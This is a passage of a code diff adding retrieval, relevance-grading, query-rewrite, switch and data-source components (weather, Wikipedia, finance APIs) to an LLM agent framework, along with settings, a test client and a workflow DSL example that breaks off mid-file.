        if not ans:
            return QWeather.be_output("")

        try:
            response = requests.get(
                url="https://geoapi.qweather.com/v2/city/lookup?location=" + ans + "&key=" + self._param.web_apikey).json()
            if response["code"] == "200":
                location_id = response["location"][0]["id"]
            else:
                return QWeather.be_output("**Error**" + self._param.error_code[response["code"]])

            base_url = "https://api.qweather.com/v7/" if self._param.user_type == 'paid' else "https://devapi.qweather.com/v7/"

            if self._param.type == "weather":
                url = base_url + "weather/" + self._param.time_period + "?location=" + location_id + "&key=" + self._param.web_apikey + "&lang=" + self._param.lang
                response = requests.get(url=url).json()
                if response["code"] == "200":
                    if self._param.time_period == "now":
                        return QWeather.be_output(str(response["now"]))
                    else:
                        qweather_res = [{"content": str(i) + "\n"} for i in response["daily"]]
                        if not qweather_res:
                            return QWeather.be_output("")

                        df = pd.DataFrame(qweather_res)
                        return df
                else:
                    return QWeather.be_output("**Error**" + self._param.error_code[response["code"]])

            elif self._param.type == "indices":
                url = base_url + "indices/1d?type=0&location=" + location_id + "&key=" + self._param.web_apikey + "&lang=" + self._param.lang
                response = requests.get(url=url).json()
                if response["code"] == "200":
                    indices_res = response["daily"][0]["date"] + "\n" + "\n".join(
                        [i["name"] + ": " + i["category"] + ", " + i["text"] for i in response["daily"]])
                    return QWeather.be_output(indices_res)
                else:
                    return QWeather.be_output("**Error**" + self._param.error_code[response["code"]])

            elif self._param.type == "airquality":
                url = base_url + "air/now?location=" + location_id + "&key=" + self._param.web_apikey + "&lang=" + self._param.lang
                response = requests.get(url=url).json()
                if response["code"] == "200":
                    return QWeather.be_output(str(response["now"]))
                else:
                    return QWeather.be_output("**Error**" + self._param.error_code[response["code"]])
        except Exception as e:
            return QWeather.be_output("**Error**" + str(e))
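QWeather resolves a city name to a location id before querying it; a minimal sketch of the same two-step flow (the key is a placeholder, and free-tier calls go through the devapi host as in the component):

import requests

KEY = "YOUR_QWEATHER_KEY"  # placeholder
# Step 1: resolve the city name to a location id.
geo = requests.get("https://geoapi.qweather.com/v2/city/lookup",
                   params={"location": "beijing", "key": KEY}).json()
location_id = geo["location"][0]["id"]
# Step 2: query current weather for that id.
now = requests.get("https://devapi.qweather.com/v7/weather/now",
                   params={"location": location_id, "key": KEY, "lang": "en"}).json()
print(now["now"])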
agent/component/relevant.py (new file, 80 lines)
@@ -0,0 +1,80 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from abc import ABC
from api.db import LLMType
from api.db.services.llm_service import LLMBundle
from agent.component import GenerateParam, Generate
from rag.utils import num_tokens_from_string, encoder


class RelevantParam(GenerateParam):
    """
    Define the Relevant component parameters.
    """

    def __init__(self):
        super().__init__()
        self.prompt = ""
        self.yes = ""
        self.no = ""

    def check(self):
        super().check()
        self.check_empty(self.yes, "[Relevant] 'Yes'")
        self.check_empty(self.no, "[Relevant] 'No'")

    def get_prompt(self):
        self.prompt = """
You are a grader assessing the relevance of a retrieved document to a user question.
It does not need to be a stringent test. The goal is to filter out erroneous retrievals.
If the document contains keyword(s) or semantic meaning related to the user question, grade it as relevant.
Give a binary score, 'yes' or 'no', to indicate whether the document is relevant to the question.
No other words are needed except 'yes' or 'no'.
"""
        return self.prompt


class Relevant(Generate, ABC):
    component_name = "Relevant"

    def _run(self, history, **kwargs):
        q = ""
        for r, c in self._canvas.history[::-1]:
            if r == "user":
                q = c
                break
        ans = self.get_input()
        ans = " - ".join(ans["content"]) if "content" in ans else ""
        if not ans:
            return Relevant.be_output(self._param.no)
        ans = "Documents: \n" + ans
        ans = f"Question: {q}\n" + ans
        chat_mdl = LLMBundle(self._canvas.get_tenant_id(), LLMType.CHAT, self._param.llm_id)

        # Clip the combined question + documents to the model's context window.
        if num_tokens_from_string(ans) >= chat_mdl.max_length - 4:
            ans = encoder.decode(encoder.encode(ans)[:chat_mdl.max_length - 4])

        ans = chat_mdl.chat(self._param.get_prompt(), [{"role": "user", "content": ans}],
                            self._param.gen_conf())

        print(ans, ":::::::::::::::::::::::::::::::::")
        if ans.lower().find("yes") >= 0:
            return Relevant.be_output(self._param.yes)
        if ans.lower().find("no") >= 0:
            return Relevant.be_output(self._param.no)
        assert False, f"Relevant component got: {ans}"
agent/component/retrieval.py (new file, 89 lines)
@@ -0,0 +1,89 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from abc import ABC

import pandas as pd

from api.db import LLMType
from api.db.services.knowledgebase_service import KnowledgebaseService
from api.db.services.llm_service import LLMBundle
from api.settings import retrievaler
from agent.component.base import ComponentBase, ComponentParamBase


class RetrievalParam(ComponentParamBase):
    """
    Define the Retrieval component parameters.
    """

    def __init__(self):
        super().__init__()
        self.similarity_threshold = 0.2
        self.keywords_similarity_weight = 0.5
        self.top_n = 8
        self.top_k = 1024
        self.kb_ids = []
        self.rerank_id = ""
        self.empty_response = ""

    def check(self):
        self.check_decimal_float(self.similarity_threshold, "[Retrieval] Similarity threshold")
        self.check_decimal_float(self.keywords_similarity_weight, "[Retrieval] Keywords similarity weight")
        self.check_positive_number(self.top_n, "[Retrieval] Top N")
        self.check_empty(self.kb_ids, "[Retrieval] Knowledge bases")


class Retrieval(ComponentBase, ABC):
    component_name = "Retrieval"

    def _run(self, history, **kwargs):
        query = []
        for role, cnt in history[::-1][:self._param.message_history_window_size]:
            if role != "user":
                continue
            query.append(cnt)
        # query = "\n".join(query)
        # Use only the most recent user message as the retrieval query.
        query = query[0]
        kbs = KnowledgebaseService.get_by_ids(self._param.kb_ids)
        if not kbs:
            raise ValueError("Can't find knowledgebases by {}".format(self._param.kb_ids))
        embd_nms = list(set([kb.embd_id for kb in kbs]))
        assert len(embd_nms) == 1, "Knowledge bases use different embedding models."

        embd_mdl = LLMBundle(self._canvas.get_tenant_id(), LLMType.EMBEDDING, embd_nms[0])
        self._canvas.set_embedding_model(embd_nms[0])

        rerank_mdl = None
        if self._param.rerank_id:
            rerank_mdl = LLMBundle(kbs[0].tenant_id, LLMType.RERANK, self._param.rerank_id)

        kbinfos = retrievaler.retrieval(query, embd_mdl, kbs[0].tenant_id, self._param.kb_ids,
                                        1, self._param.top_n,
                                        self._param.similarity_threshold, 1 - self._param.keywords_similarity_weight,
                                        aggs=False, rerank_mdl=rerank_mdl)

        if not kbinfos["chunks"]:
            df = Retrieval.be_output("")
            if self._param.empty_response and self._param.empty_response.strip():
                df["empty_response"] = self._param.empty_response
            return df

        df = pd.DataFrame(kbinfos["chunks"])
        df["content"] = df["content_with_weight"]
        del df["content_with_weight"]
        print(">>>>>>>>>>>>>>>>>>>>>>>>>>\n", query, df)
        return df
agent/component/rewrite.py (new file, 72 lines)
@@ -0,0 +1,72 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from abc import ABC
from api.db import LLMType
from api.db.services.llm_service import LLMBundle
from agent.component import GenerateParam, Generate


class RewriteQuestionParam(GenerateParam):
    """
    Define the QuestionRewrite component parameters.
    """

    def __init__(self):
        super().__init__()
        self.temperature = 0.9
        self.prompt = ""
        self.loop = 1

    def check(self):
        super().check()

    def get_prompt(self):
        self.prompt = """
You are an expert at query expansion, generating paraphrasings of a question.
I can't retrieve relevant information from the knowledge base by using the user's question directly.
You need to expand or paraphrase the user's question in multiple ways, such as using synonym words/phrases,
writing an abbreviation out in full, adding some extra descriptions or explanations,
changing the way of expression, translating the original question into another language (English/Chinese), etc.
Return 5 versions of the question, one of which is a translation.
Just list the questions. No other words are needed.
"""
        return self.prompt


class RewriteQuestion(Generate, ABC):
    component_name = "RewriteQuestion"

    def _run(self, history, **kwargs):
        if not hasattr(self, "_loop"):
            setattr(self, "_loop", 0)
        if self._loop >= self._param.loop:
            self._loop = 0
            raise Exception("Sorry! Nothing relevant found.")
        self._loop += 1
        q = "Question: "
        for r, c in self._canvas.history[::-1]:
            if r == "user":
                q += c
                break

        chat_mdl = LLMBundle(self._canvas.get_tenant_id(), LLMType.CHAT, self._param.llm_id)
        ans = chat_mdl.chat(self._param.get_prompt(), [{"role": "user", "content": q}],
                            self._param.gen_conf())

        print(ans, ":::::::::::::::::::::::::::::::::")
        return RewriteQuestion.be_output(ans)
agent/component/switch.py (new file, 125 lines)
@@ -0,0 +1,125 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from abc import ABC
from agent.component.base import ComponentBase, ComponentParamBase


class SwitchParam(ComponentParamBase):
    """
    Define the Switch component parameters.
    """

    def __init__(self):
        super().__init__()
        """
        Each condition looks like:
        {
            "logical_operator" : "and | or",
            "items" : [
                {"cpn_id": "categorize:0", "operator": "contains", "value": ""},
                {"cpn_id": "categorize:0", "operator": "contains", "value": ""}, ...],
            "to": ""
        }
        """
        self.conditions = []
        self.end_cpn_id = "answer:0"
        self.operators = ['contains', 'not contains', 'start with', 'end with', 'empty', 'not empty', '=', '≠', '>',
                          '<', '≥', '≤']

    def check(self):
        self.check_empty(self.conditions, "[Switch] conditions")
        for cond in self.conditions:
            if not cond["to"]:
                raise ValueError("[Switch] 'To' can not be empty!")


class Switch(ComponentBase, ABC):
    component_name = "Switch"

    def _run(self, history, **kwargs):
        for cond in self._param.conditions:

            if len(cond["items"]) == 1:
                out = self._canvas.get_component(cond["items"][0]["cpn_id"])["obj"].output()[1]
                cpn_input = "" if "content" not in out.columns else " ".join(out["content"])
                if self.process_operator(cpn_input, cond["items"][0]["operator"], cond["items"][0]["value"]):
                    return Switch.be_output(cond["to"])
                continue

            if cond["logical_operator"] == "and":
                res = True
                for item in cond["items"]:
                    out = self._canvas.get_component(item["cpn_id"])["obj"].output()[1]
                    cpn_input = "" if "content" not in out.columns else " ".join(out["content"])
                    if not self.process_operator(cpn_input, item["operator"], item["value"]):
                        res = False
                        break
                if res:
                    return Switch.be_output(cond["to"])
                continue

            res = False
            for item in cond["items"]:
                out = self._canvas.get_component(item["cpn_id"])["obj"].output()[1]
                cpn_input = "" if "content" not in out.columns else " ".join(out["content"])
                if self.process_operator(cpn_input, item["operator"], item["value"]):
                    res = True
                    break
            if res:
                return Switch.be_output(cond["to"])

        return Switch.be_output(self._param.end_cpn_id)

    def process_operator(self, input: str, operator: str, value: str) -> bool:
        if not isinstance(input, str) or not isinstance(value, str):
            raise ValueError('Invalid input or value type: both must be strings')

        if operator == "contains":
            return value.lower() in input.lower()
        elif operator == "not contains":
            return value.lower() not in input.lower()
        elif operator == "start with":
            return input.lower().startswith(value.lower())
        elif operator == "end with":
            return input.lower().endswith(value.lower())
        elif operator == "empty":
            return not input
        elif operator == "not empty":
            return bool(input)
        elif operator == "=":
            return input == value
        elif operator == "≠":
            return input != value
        elif operator == ">":
            try:
                return float(input) > float(value)
            except ValueError:
                return input > value
        elif operator == "<":
            try:
                return float(input) < float(value)
            except ValueError:
                return input < value
        elif operator == "≥":
            try:
                return float(input) >= float(value)
            except ValueError:
                return input >= value
        elif operator == "≤":
            try:
                return float(input) <= float(value)
            except ValueError:
                return input <= value

        raise ValueError('Unsupported operator: ' + operator)
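One subtlety in the numeric operators above is the lexicographic fallback when a value does not parse as a number; a standalone illustration of the same comparison logic (function name is illustrative):

def compare_gt(a: str, b: str) -> bool:
    # Try numeric comparison first; fall back to string comparison,
    # mirroring the ">" branch of process_operator.
    try:
        return float(a) > float(b)
    except ValueError:
        return a > b

print(compare_gt("10", "9"))    # True  (numeric: 10 > 9)
print(compare_gt("v10", "v9"))  # False (lexicographic: "v10" < "v9")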
agent/component/tushare.py (new file, 72 lines)
@@ -0,0 +1,72 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
from abc import ABC
import pandas as pd
import time
import requests
from agent.component.base import ComponentBase, ComponentParamBase


class TuShareParam(ComponentParamBase):
    """
    Define the TuShare component parameters.
    """

    def __init__(self):
        super().__init__()
        self.token = "xxx"
        self.src = "eastmoney"
        self.start_date = "2024-01-01 09:00:00"
        self.end_date = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
        self.keyword = ""

    def check(self):
        self.check_valid_value(self.src, "Quick News Source",
                               ["sina", "wallstreetcn", "10jqka", "eastmoney", "yuncaijing", "fenghuang", "jinrongjie"])


class TuShare(ComponentBase, ABC):
    component_name = "TuShare"

    def _run(self, history, **kwargs):
        ans = self.get_input()
        ans = ",".join(ans["content"]) if "content" in ans else ""
        if not ans:
            return TuShare.be_output("")

        try:
            tus_res = []
            params = {
                "api_name": "news",
                "token": self._param.token,
                "params": {"src": self._param.src, "start_date": self._param.start_date,
                           "end_date": self._param.end_date}
            }
            response = requests.post(url="http://api.tushare.pro", data=json.dumps(params).encode('utf-8'))
            response = response.json()
            if response['code'] != 0:
                return TuShare.be_output(response['msg'])
            df = pd.DataFrame(response['data']['items'])
            df.columns = response['data']['fields']
            tus_res.append({"content": (df[df['content'].str.contains(self._param.keyword, case=False)]).to_markdown()})
        except Exception as e:
            return TuShare.be_output("**ERROR**: " + str(e))

        if not tus_res:
            return TuShare.be_output("")

        return pd.DataFrame(tus_res)
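For context, TuShare's HTTP API takes a single JSON envelope of api_name, token, and api-specific params; a minimal sketch of the same request outside the component (the token is a placeholder):

import json
import requests

payload = {
    "api_name": "news",
    "token": "YOUR_TUSHARE_TOKEN",  # placeholder
    "params": {"src": "eastmoney", "start_date": "2024-01-01 09:00:00",
               "end_date": "2024-01-02 09:00:00"},
}
resp = requests.post("http://api.tushare.pro", data=json.dumps(payload).encode("utf-8")).json()
if resp["code"] == 0:
    print(resp["data"]["fields"])  # column names for the rows in resp["data"]["items"]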
agent/component/wencai.py (new file, 74 lines)
@@ -0,0 +1,74 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from abc import ABC
import pandas as pd
import pywencai
from agent.component.base import ComponentBase, ComponentParamBase


class WenCaiParam(ComponentParamBase):
    """
    Define the WenCai component parameters.
    """

    def __init__(self):
        super().__init__()
        self.top_n = 10
        self.query_type = "stock"

    def check(self):
        self.check_positive_integer(self.top_n, "Top N")
        self.check_valid_value(self.query_type, "Query type",
                               ['stock', 'zhishu', 'fund', 'hkstock', 'usstock', 'threeboard', 'conbond', 'insurance',
                                'futures', 'lccp', 'foreign_exchange'])


class WenCai(ComponentBase, ABC):
    component_name = "WenCai"

    def _run(self, history, **kwargs):
        ans = self.get_input()
        ans = ",".join(ans["content"]) if "content" in ans else ""
        if not ans:
            return WenCai.be_output("")

        try:
            wencai_res = []
            res = pywencai.get(query=ans, query_type=self._param.query_type, perpage=self._param.top_n)
            if isinstance(res, pd.DataFrame):
                wencai_res.append({"content": res.to_markdown()})
            if isinstance(res, dict):
                for item in res.items():
                    if isinstance(item[1], list):
                        wencai_res.append({"content": item[0] + "\n" + pd.DataFrame(item[1]).to_markdown()})
                        continue
                    if isinstance(item[1], str):
                        wencai_res.append({"content": item[0] + "\n" + item[1]})
                        continue
                    if isinstance(item[1], dict):
                        if "meta" in item[1].keys():
                            continue
                        wencai_res.append({"content": pd.DataFrame.from_dict(item[1], orient='index').to_markdown()})
                        continue
                    wencai_res.append({"content": item[0] + "\n" + str(item[1])})
        except Exception as e:
            return WenCai.be_output("**ERROR**: " + str(e))

        if not wencai_res:
            return WenCai.be_output("")

        return pd.DataFrame(wencai_res)
agent/component/wikipedia.py (new file, 69 lines)
@@ -0,0 +1,69 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import random
from abc import ABC
from functools import partial
import wikipedia
import pandas as pd
from agent.settings import DEBUG
from agent.component.base import ComponentBase, ComponentParamBase


class WikipediaParam(ComponentParamBase):
    """
    Define the Wikipedia component parameters.
    """

    def __init__(self):
        super().__init__()
        self.top_n = 10
        self.language = "en"

    def check(self):
        self.check_positive_integer(self.top_n, "Top N")
        self.check_valid_value(self.language, "Wikipedia languages",
                               ['af', 'pl', 'ar', 'ast', 'az', 'bg', 'nan', 'bn', 'be', 'ca', 'cs', 'cy', 'da', 'de',
                                'et', 'el', 'en', 'es', 'eo', 'eu', 'fa', 'fr', 'gl', 'ko', 'hy', 'hi', 'hr', 'id',
                                'it', 'he', 'ka', 'lld', 'la', 'lv', 'lt', 'hu', 'mk', 'arz', 'ms', 'min', 'my', 'nl',
                                'ja', 'nb', 'nn', 'ce', 'uz', 'pt', 'kk', 'ro', 'ru', 'ceb', 'sk', 'sl', 'sr', 'sh',
                                'fi', 'sv', 'ta', 'tt', 'th', 'tg', 'azb', 'tr', 'uk', 'ur', 'vi', 'war', 'zh', 'yue'])


class Wikipedia(ComponentBase, ABC):
    component_name = "Wikipedia"

    def _run(self, history, **kwargs):
        ans = self.get_input()
        ans = " - ".join(ans["content"]) if "content" in ans else ""
        if not ans:
            return Wikipedia.be_output("")

        try:
            wiki_res = []
            wikipedia.set_lang(self._param.language)
            wiki_engine = wikipedia
            for wiki_key in wiki_engine.search(ans, results=self._param.top_n):
                page = wiki_engine.page(title=wiki_key, auto_suggest=False)
                wiki_res.append({"content": '<a href="' + page.url + '">' + page.title + '</a> ' + page.summary})
        except Exception as e:
            return Wikipedia.be_output("**ERROR**: " + str(e))

        if not wiki_res:
            return Wikipedia.be_output("")

        df = pd.DataFrame(wiki_res)
        if DEBUG:
            print(df, ":::::::::::::::::::::::::::::::::")
        return df
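A minimal sketch of the wikipedia-package calls used above (the query is illustrative); auto_suggest=False keeps the fetched page aligned with the exact search hit:

import wikipedia

wikipedia.set_lang("en")
for title in wikipedia.search("transformer model", results=3):
    # Note: page() can raise a DisambiguationError for ambiguous titles,
    # which the component's blanket except absorbs.
    page = wikipedia.page(title=title, auto_suggest=False)
    print(page.title, "->", page.url)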
agent/component/yahoofinance.py (new file, 83 lines)
@@ -0,0 +1,83 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from abc import ABC
import pandas as pd
from agent.component.base import ComponentBase, ComponentParamBase
import yfinance as yf


class YahooFinanceParam(ComponentParamBase):
    """
    Define the YahooFinance component parameters.
    """

    def __init__(self):
        super().__init__()
        self.info = True
        self.history = False
        self.count = False
        self.financials = False
        self.income_stmt = False
        self.balance_sheet = False
        self.cash_flow_statement = False
        self.news = True

    def check(self):
        self.check_boolean(self.info, "get all stock info")
        self.check_boolean(self.history, "get historical market data")
        self.check_boolean(self.count, "show share count")
        self.check_boolean(self.financials, "show financials")
        self.check_boolean(self.income_stmt, "income statement")
        self.check_boolean(self.balance_sheet, "balance sheet")
        self.check_boolean(self.cash_flow_statement, "cash flow statement")
        self.check_boolean(self.news, "show news")


class YahooFinance(ComponentBase, ABC):
    component_name = "YahooFinance"

    def _run(self, history, **kwargs):
        ans = self.get_input()
        ans = "".join(ans["content"]) if "content" in ans else ""
        if not ans:
            return YahooFinance.be_output("")

        yohoo_res = []
        try:
            msft = yf.Ticker(ans)
            if self._param.info:
                yohoo_res.append({"content": "info:\n" + pd.Series(msft.info).to_markdown() + "\n"})
            if self._param.history:
                yohoo_res.append({"content": "history:\n" + msft.history().to_markdown() + "\n"})
            if self._param.financials:
                yohoo_res.append({"content": "calendar:\n" + pd.DataFrame(msft.calendar).to_markdown() + "\n"})
            if self._param.balance_sheet:
                yohoo_res.append({"content": "balance sheet:\n" + msft.balance_sheet.to_markdown() + "\n"})
                yohoo_res.append(
                    {"content": "quarterly balance sheet:\n" + msft.quarterly_balance_sheet.to_markdown() + "\n"})
            if self._param.cash_flow_statement:
                yohoo_res.append({"content": "cash flow statement:\n" + msft.cashflow.to_markdown() + "\n"})
                yohoo_res.append(
                    {"content": "quarterly cash flow statement:\n" + msft.quarterly_cashflow.to_markdown() + "\n"})
            if self._param.news:
                yohoo_res.append({"content": "news:\n" + pd.DataFrame(msft.news).to_markdown() + "\n"})
        except Exception as e:
            print("**ERROR** " + str(e))

        if not yohoo_res:
            return YahooFinance.be_output("")

        return pd.DataFrame(yohoo_res)
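A minimal sketch of the yfinance calls the component relies on (the ticker symbol is illustrative):

import yfinance as yf

ticker = yf.Ticker("MSFT")
print(ticker.info.get("shortName"))        # company metadata as a dict
print(ticker.history(period="5d").tail())  # recent daily OHLCV rows
print(len(ticker.news), "news items")      # list of recent news entries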
agent/settings.py (new file, 34 lines)
@@ -0,0 +1,34 @@
#
# Copyright 2019 The FATE Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Logger
import os

from api.utils.file_utils import get_project_base_directory
from api.utils.log_utils import LoggerFactory, getLogger

DEBUG = 0
LoggerFactory.set_directory(
    os.path.join(
        get_project_base_directory(),
        "logs",
        "flow"))
# {CRITICAL: 50, FATAL: 50, ERROR: 40, WARNING: 30, WARN: 30, INFO: 20, DEBUG: 10, NOTSET: 0}
LoggerFactory.LEVEL = 30

flow_logger = getLogger("flow")
database_logger = getLogger("database")
FLOAT_ZERO = 1e-8
PARAM_MAXDEPTH = 5
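Any component in the package picks these settings up simply by importing the module-level loggers. A minimal usage sketch, assuming the LoggerFactory configuration shown above:

from agent.settings import DEBUG, flow_logger

# LoggerFactory.LEVEL = 30 means WARNING and above reach logs/flow;
# INFO and DEBUG records are filtered out.
flow_logger.info("filtered out at level 30")
flow_logger.warning("written to the flow log")
if DEBUG:
    flow_logger.warning("extra diagnostics when DEBUG is enabled")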
687
agent/templates/DB Assistant.json
Normal file
File diff suppressed because one or more lines are too long
725
agent/templates/HR_callout_zh.json
Normal file
File diff suppressed because one or more lines are too long
620
agent/templates/customer_service.json
Normal file
File diff suppressed because one or more lines are too long
335
agent/templates/general_chat_bot.json
Normal file
File diff suppressed because one or more lines are too long
158
agent/templates/interpreter.json
Normal file
File diff suppressed because one or more lines are too long
492
agent/templates/medical_consultation.json
Normal file
File diff suppressed because one or more lines are too long
445
agent/templates/text2sql.json
Normal file
File diff suppressed because one or more lines are too long
547
agent/templates/websearch_assistant.json
Normal file
File diff suppressed because one or more lines are too long
48
agent/test/client.py
Normal file
@@ -0,0 +1,48 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import argparse
import os
from functools import partial
from agent.canvas import Canvas
from agent.settings import DEBUG

if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    dsl_default_path = os.path.join(
        os.path.dirname(os.path.realpath(__file__)),
        "dsl_examples",
        "retrieval_and_generate.json",
    )
    # --dsl has a default, so it need not be required on the command line.
    parser.add_argument('-s', '--dsl', default=dsl_default_path, help="input dsl", action='store', required=False)
    parser.add_argument('-t', '--tenant_id', help="Tenant ID", action='store', required=True)
    parser.add_argument('-m', '--stream', default=False, help="Stream output", action='store_true', required=False)
    args = parser.parse_args()

    canvas = Canvas(open(args.dsl, "r").read(), args.tenant_id)
    while True:
        ans = canvas.run(stream=args.stream)
        print("==================== Bot =====================\n> ", end='')
        if args.stream and isinstance(ans, partial):
            cont = ""
            for an in ans():
                print(an["content"][len(cont):], end='', flush=True)
                cont = an["content"]
        else:
            print(ans["content"])

        if DEBUG:
            print(canvas.path)
        question = input("\n==================== User =====================\n> ")
        canvas.add_user_input(question)
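For a one-shot, non-interactive run, the same Canvas API can be driven directly. A minimal sketch, assuming a valid tenant ID (the "my_tenant_id" placeholder below) and the bundled example DSL:

from agent.canvas import Canvas

# "my_tenant_id" is a placeholder; substitute a real tenant ID from your deployment.
dsl = open("agent/test/dsl_examples/retrieval_and_generate.json", "r").read()
canvas = Canvas(dsl, "my_tenant_id")
ans = canvas.run(stream=False)
print(ans["content"])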
129
agent/test/dsl_examples/baidu_generate_and_switch.json
Normal file
@@ -0,0 +1,129 @@
{
    "components": {
        "begin": {
            "obj": {
                "component_name": "Begin",
                "params": {
                    "prologue": "Hi there!"
                }
            },
            "downstream": ["answer:0"],
            "upstream": []
        },
        "answer:0": {
            "obj": {
                "component_name": "Answer",
                "params": {}
            },
            "downstream": ["baidu:0"],
            "upstream": ["begin", "message:0", "message:1", "message:2"]
        },
        "baidu:0": {
            "obj": {
                "component_name": "Baidu",
                "params": {}
            },
            "downstream": ["generate:0"],
            "upstream": ["answer:0"]
        },
        "generate:0": {
            "obj": {
                "component_name": "Generate",
                "params": {
                    "llm_id": "deepseek-chat",
                    "prompt": "You are an intelligent assistant. Please answer the user's question based on what Baidu searched. First, please output the user's question and the content searched by Baidu, and then answer yes, no, or I don't know. Here is the user's question: {user_input} The above is the user's question. Here is what Baidu searched for: {baidu} The above is the content searched by Baidu.",
                    "temperature": 0.2
                },
                "parameters": [
                    {
                        "component_id": "answer:0",
                        "id": "69415446-49bf-4d4b-8ec9-ac86066f7709",
                        "key": "user_input"
                    },
                    {
                        "component_id": "baidu:0",
                        "id": "83363c2a-00a8-402f-a45c-ddc4097d7d8b",
                        "key": "baidu"
                    }
                ]
            },
            "downstream": ["switch:0"],
            "upstream": ["baidu:0"]
        },
        "switch:0": {
            "obj": {
                "component_name": "Switch",
                "params": {
                    "conditions": [
                        {
                            "logical_operator": "or",
                            "items": [
                                {"cpn_id": "generate:0", "operator": "contains", "value": "yes"},
                                {"cpn_id": "generate:0", "operator": "contains", "value": "yeah"}
                            ],
                            "to": "message:0"
                        },
                        {
                            "logical_operator": "and",
                            "items": [
                                {"cpn_id": "generate:0", "operator": "contains", "value": "no"},
                                {"cpn_id": "generate:0", "operator": "not contains", "value": "yes"},
                                {"cpn_id": "generate:0", "operator": "not contains", "value": "know"}
                            ],
                            "to": "message:1"
                        },
                        {
                            "logical_operator": "",
                            "items": [
                                {"cpn_id": "generate:0", "operator": "contains", "value": "know"}
                            ],
                            "to": "message:2"
                        }
                    ],
                    "end_cpn_id": "answer:0"
                }
            },
            "downstream": ["message:0", "message:1", "message:2"],
            "upstream": ["generate:0"]
        },
        "message:0": {
            "obj": {
                "component_name": "Message",
                "params": {
                    "messages": ["YES YES YES YES YES YES YES YES YES YES YES YES"]
                }
            },
            "upstream": ["switch:0"],
            "downstream": ["answer:0"]
        },
        "message:1": {
            "obj": {
                "component_name": "Message",
                "params": {
                    "messages": ["NO NO NO NO NO NO NO NO NO NO NO NO NO NO"]
                }
            },
            "upstream": ["switch:0"],
            "downstream": ["answer:0"]
        },
        "message:2": {
            "obj": {
                "component_name": "Message",
                "params": {
                    "messages": ["I DON'T KNOW---------------------------"]
                }
